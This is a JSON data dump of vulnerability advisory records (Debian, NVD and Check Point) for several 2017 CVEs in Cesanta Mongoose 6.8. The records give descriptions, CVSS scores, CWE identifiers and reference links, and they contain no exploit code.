resulting in denial of service and potential remote code execution. 
An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2921", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2921", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable use-after-free vulnerability exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of previously freed pointer potentially resulting in remote code execution. 
An attacker needs to send this HTTP request over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2891", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2891", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2891", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An infinite loop programming error exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. 
An attacker can send a packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2909", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2909"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2909", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2909", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an arbitrary out-of-bounds memory read and write potentially resulting in information disclosure, denial of service and remote code execution. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2892", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2892"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2892", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2892", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2893", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2893"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2893", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2893", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of-bounds memory read potentially resulting in information disclosure and denial of service. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2895", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2895"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2895", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2895", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which leads to a use-after-free vulnerability which can be exploited to achieve remote code execution. 
An attacker needs to send a specially crafted websocket packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2922", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2922"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2922", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2922", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T06:02:23", "description": "An exploitable stack buffer overflow vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2894"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2894", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2894", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-06-13T20:35:31", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. 
An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2921", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2022-06-13T19:16:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2921", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2921", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-07T18:43:57", "description": "An exploitable use-after-free vulnerability exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of previously freed pointer potentially resulting in remote code execution. 
An attacker needs to send this HTTP request over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2891", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891"], "modified": "2022-06-07T17:24:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2891", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2891", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-13T20:35:33", "description": "An infinite loop programming error exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. 
An attacker can send a packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2909", "cwe": ["CWE-835"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2909"], "modified": "2022-06-13T19:17:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2909", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-07T18:43:56", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an arbitrary out-of-bounds memory read and write potentially resulting in information disclosure, denial of service and remote code execution. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2892", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2892"], "modified": "2022-06-07T17:24:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2892", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2892", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-07T18:43:56", "description": "An exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2893", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2893"], "modified": "2022-06-07T17:24:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2893", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2893", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-07T18:43:55", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of-bounds memory read potentially resulting in information disclosure and denial of service. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2895", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2895"], "modified": "2022-06-07T17:24:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2895", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2895", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-13T20:35:31", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which leads to a use-after-free vulnerability which can be exploited to achieve remote code execution. 
An attacker needs to send a specially crafted websocket packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2922", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2922"], "modified": "2022-06-13T19:16:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2922", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2922", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-07T18:43:55", "description": "An exploitable stack buffer overflow vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2894", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2894"], "modified": "2022-06-07T17:24:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2894", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2894", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-06-13T22:29:50", "description": "An infinite loop vulnerability exists in the DNS server functionality of Cesanta Mongoose. The vulnerability is due to insufficient handling of compressed names in DNS queries and responses. 
A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted DNS query or response to an application implementing the Mongoose DNS server functionality or DNS client functionality, respectively.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-16T00:00:00", "type": "checkpoint_advisories", "title": "Cesanta Mongoose DNS Compressed Name Denial of Service (CVE-2017-2909)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2909"], "modified": "2017-11-27T00:00:00", "id": "CPAI-2017-1001", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}